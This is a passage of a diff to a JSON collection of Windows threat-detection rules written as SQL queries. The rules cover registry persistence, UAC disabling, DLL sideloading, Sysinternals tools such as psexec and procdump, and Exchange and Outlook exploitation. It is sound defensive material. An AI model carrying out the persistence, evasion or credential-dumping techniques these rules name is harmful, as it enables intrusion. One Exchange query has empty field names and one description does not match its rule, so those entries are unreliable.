'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\servicing\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\uus\\\\%' ESCAPE '\\')) OR (ProcessId = '4') OR ((Image LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (Image IN ('System', 'Registry')) OR (Image LIKE '%\\\\Keybase\\\\upd.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\thor.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SystemApps\\\\Microsoft.Windows.StartMenuExperienceHost%' ESCAPE '\\' AND Image LIKE '%\\\\StartMenuExperienceHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download%' ESCAPE '\\' AND Image LIKE '%\\\\WindowsUpdateBox.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND Image LIKE '%\\\\resources\\\\app\\\\git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\HostMetadata\\\\NVMEHostmetadata.exe' ESCAPE '\\' OR Image LIKE '%\\\\Executables\\\\SSDUpdate.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_sip_persistence.yml" + "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml" }, { - "title": "Internet Explorer Autorun Keys Modification", - "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Modification of Explorer Hidden Keys", - "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "title": "Unsigned Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", - "author": "frack113", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_hide_file.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "Add DisallowRun Execution to Registry", - "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", "status": "experimental", - "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", - "author": "frack113", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_disallowrun_execution.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Standard User In High Privileged Group", + "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.credential_access", + "attack.privilege_escalation" + ], + "falsepositives": [ + "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + ], + "filename": "win_lsa_server_normal_user_admin.yml" + }, + { + "title": "Sysinternals Tools AppX Versions Execution", + "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", + "status": "experimental", + "description": "Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the applications from the Windows Store" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" }, { - "title": "COM Hijack via Sdclt", - "id": "07743f65-7ec9-404a-a519-913db7118a8d", + "title": "Suspicious Rejected SMB Guest Logon From IP", + "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", "status": "test", - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", + "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", "tags": [ - "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + "attack.credential_access", + "attack.t1110.001" ], "falsepositives": [ - "Unknown" + "Account fallback reasons (after failed login with specific account)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "win_smbclient_security_susp_failed_guest_logon.yml" }, { - "title": "New Application in AppCompat", - "id": "60936b49-fca0-4f32-993d-7415edcf9a5d", - "status": "test", - "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential CVE-2023-23397 Exploitation Attempt - SMB", + "id": "de96b824-02b0-4241-9356-7e9b47f04bac", + "status": "experimental", + "description": "Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.exfiltration", + "cve.2023.23397" ], "falsepositives": [ - "This rule is to explore new applications on an endpoint. False positives depends on the organization.", - "Newly setup system.", - "Legitimate installation of new application." + "Some false positives may occur from external trusted servers. Apply additional filters accordingly" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('30803', '30804', '30806') AND NOT (((ServerAddress LIKE '10.%' ESCAPE '\\' OR ServerAddress LIKE '192.168.%' ESCAPE '\\' OR ServerAddress LIKE '172.16.%' ESCAPE '\\' OR ServerAddress LIKE '172.17.%' ESCAPE '\\' OR ServerAddress LIKE '172.18.%' ESCAPE '\\' OR ServerAddress LIKE '172.19.%' ESCAPE '\\' OR ServerAddress LIKE '172.20.%' ESCAPE '\\' OR ServerAddress LIKE '172.21.%' ESCAPE '\\' OR ServerAddress LIKE '172.22.%' ESCAPE '\\' OR ServerAddress LIKE '172.23.%' ESCAPE '\\' OR ServerAddress LIKE '172.24.%' ESCAPE '\\' OR ServerAddress LIKE '172.25.%' ESCAPE '\\' OR ServerAddress LIKE '172.26.%' ESCAPE '\\' OR ServerAddress LIKE '172.27.%' ESCAPE '\\' OR ServerAddress LIKE '172.28.%' ESCAPE '\\' OR ServerAddress LIKE '172.29.%' ESCAPE '\\' OR ServerAddress LIKE '172.30.%' ESCAPE '\\' OR ServerAddress LIKE '172.31.%' ESCAPE '\\' OR ServerAddress LIKE '127.%' ESCAPE '\\' OR ServerAddress LIKE '169.254.%' ESCAPE '\\'))))" ], - "filename": "registry_set_new_application_appcompat.yml" + "filename": "win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml" }, { - "title": "ServiceDll Hijack", - "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", - "status": "experimental", - "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", - "author": "frack113", + "title": "MSExchange Transport Agent Installation - Builtin", + "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "status": "test", + "description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1505.002" ], "falsepositives": [ - "Administrative scripts", - "Installation of a service" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" ], - "filename": "registry_set_servicedll_hijack.yml" + "filename": "win_exchange_transportagent.yml" }, { - "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", "status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ "attack.persistence", - "attack.t1133" + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "Disable UAC Using Registry", - "id": "48437c39-9e5f-47fb-af95-3d663c3f2919", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", "status": "experimental", - "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", - "author": "frack113", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_disable_uac_registry.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting 